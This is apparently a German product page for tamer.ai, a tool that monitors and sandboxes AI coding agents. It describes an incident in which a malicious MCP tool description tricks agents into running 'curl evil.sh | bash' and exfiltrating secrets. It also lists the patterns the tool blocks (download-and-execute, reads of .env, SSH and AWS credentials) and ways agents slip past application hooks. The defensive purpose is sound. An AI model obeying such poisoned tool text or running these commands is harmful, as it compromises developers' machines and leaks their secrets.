Praxisnahe
Anwendungsfälle

KI-Agenten sind leistungsstark — aber unkontrolliert auch gefährlich. So schützt tamer.ai echte Teams in realen Szenarien.

Zu den Fällen ↓
FALL 1

Supply-Chain-Schutz

So blockiert tamer.ai Supply-Chain-Angriffe über KI-Agenten, bevor sie Ihre Maschine erreichen.

Das Problem

Im Februar 2026 zeigte der hackerbot-claw-Vorfall einen neuen Angriffsvektor: Ein bösartiger MCP-Server, als legitimes Tool veröffentlicht, brachte KI-Agenten dazu, curl | sh-Befehle auszuführen und beliebigen Code auf Entwicklermaschinen herunterzuladen.

Der Agent folgte den Anweisungen der manipulierten Tool-Beschreibung — er konnte nicht erkennen, dass die Payload bösartig war. Tausende Maschinen wurden kompromittiert, bevor das Paket gemeldet wurde.

Die Tamer-Lösung

Download-&-Execute-Erkennung — blockiert curl | sh, wget | bash und verkettete Ausführungsmuster in Echtzeit
Exfiltrations-Schutz — erkennt ausgehende Datenübertragungen von Dateien, Umgebungsvariablen oder Zugangsdaten an unbekannte Endpunkte
CI/CD-Schutz — verhindert unautorisierte Änderungen an .github/workflows/ und .gitlab-ci.yml
Credential-Zugriffsschutz — verhindert Lesezugriffe auf .env, API-Schlüssel und SSH-Keys, unabhängig von der Absicht des Agenten

Angriffsablauf — mit und ohne tamer

Ohne tamer
Bösartiges MCP-Tool Agent
"Installiere diese Abhängigkeit"
curl evil.sh | bash
Payload wird frei ausgeführt
Secrets werden exfiltriert
Mit tamer
Bösartiges MCP-Tool Agent
"Installiere diese Abhängigkeit"
curl evil.sh | bash
BLOCKIERT: download_exec-Muster
Alarm an Ihr Telefon gesendet
FALL 2

Multi-Agenten-Supervision

Lassen Sie ein Team von KI-Agenten parallel arbeiten — mit einem Master, der sie koordiniert und unter Kontrolle hält.

Das Problem

Mehrere KI-Agenten auf derselben Codebasis führen zu Chaos: widersprüchliche Datei-Änderungen, doppelte Arbeit, blockierende Genehmigungsaufforderungen und null Transparenz darüber, was jeder Agent tatsächlich tut.

Ohne Koordination können zwei Agenten gleichzeitig dieselbe Datei bearbeiten und Merge-Konflikte erzeugen, die keiner von beiden lösen kann. Am Ende überwachen Sie jedes Terminal, statt Code zu liefern.

Die Tamer-Lösung

Master Agent — ein KI-Supervisor, der Worker orchestriert, Konflikte erkennt und Genehmigungen automatisch verwaltet
Konflikterkennung — verfolgt jede Datei, die jeder Worker berührt, und warnt vor Kollisionen
Rollenbasierte Pipelines — weisen Sie Rollen zu: Coder, Reviewer, Tester. Claude codiert, Gemini testet, Aider reviewt — automatisch
Muster-Lernen — der Master lernt aus Ihren Genehmigungsentscheidungen und genehmigt sichere Muster beim nächsten Mal automatisch

Multi-Agenten-Pipeline-Architektur

Master Agent
orchestriert • erkennt Konflikte • genehmigt
Claude Code
Coder
Gemini CLI
Tester
Aider
Reviewer
Ihr Telefon
Dashboard • Genehmigen • Eingreifen
FALL 3

Kernel-Level Sandbox

Sperren Sie jeden KI-Agenten in einen vom Kernel durchgesetzten Bereich ein — selbst wenn der Agent auszubrechen versucht.

Das Problem

Hooks auf Anwendungsebene können umgangen werden. Ein KI-Agent mit Shell-Zugriff kann einen Python-Subprozess starten, Dateien direkt öffnen oder Systemaufrufe nutzen, die Ihre Sicherheits-Hooks komplett umgehen.

Ihre ~/.ssh-Schlüssel, ~/.aws-Credentials und .env-Dateien sind alle erreichbar — der Agent braucht nur den Pfad.

Die Tamer-Lösung

Landlock LSM (Linux) — Dateisystem-Zugriffskontrolle auf Kernel-Ebene. Der Agent kann physisch keine Dateien außerhalb seines Workspace lesen.
seccomp-BPF — Syscall-Filterung blockiert Netzwerk-Sockets, ptrace, mount und Privilegien-Eskalation.
Job Object (Windows) — Prozess-Containment mit Ressourcenlimits und Kill-on-Close-Garantie.
Zweischicht-Verteidigung — Anwendungs-Hooks für den Alltag (Alarme, Genehmigungen). Die Kernel-Sandbox ist die letzte Mauer, die niemals fällt.
FALL 4

Skill Engine

Schreiben Sie einen Skill einmal, nutzen Sie ihn mit jedem KI-Agenten — Claude Code, Cursor, Windsurf oder jedem CLI-Tool.

Das Problem

Jeder KI-Agent hat sein eigenes Anweisungsformat: Claude Code nutzt CLAUDE.md, Cursor nutzt .cursorrules, Windsurf nutzt .windsurfrules. Wenn Sie Agenten wechseln oder mehrere in einer Pipeline verwenden, pflegen Sie dasselbe Wissen in inkompatiblen Formaten.

Teams verschwenden Stunden damit, Coding-Guidelines, Review-Checklisten und Debug-Workflows in agenten-spezifischen Konfigurationsdateien zu duplizieren.

Die Tamer-Lösung

Kanonisches Format — eine Markdown-Datei pro Skill mit strukturiertem Frontmatter. Einmal schreiben, tamer transformiert es für jeden Agenten.
Multi-Agenten-Adapter — eingebaute Transformer für Claude Code (CLAUDE.md-Injektion), Cursor (.cursorrules), Windsurf (.windsurfrules) und generischer Fallback.
CLI-Verwaltungtamer skill install, tamer skill list, tamer skill remove. Einfach und vertraut.
Auto-Install — Skills können beim tamer connect via Konfiguration vorinstalliert werden. Ihr ganzes Team erhält dieselben Skills, jedes Mal.

Bereit, Ihre Agenten zu zähmen?

Drei Befehle bis zum vollen Schutz.

$ curl -fsSL https://server.tamer-ai.dev/install.sh | bash
$ tamer init
$ tamer claude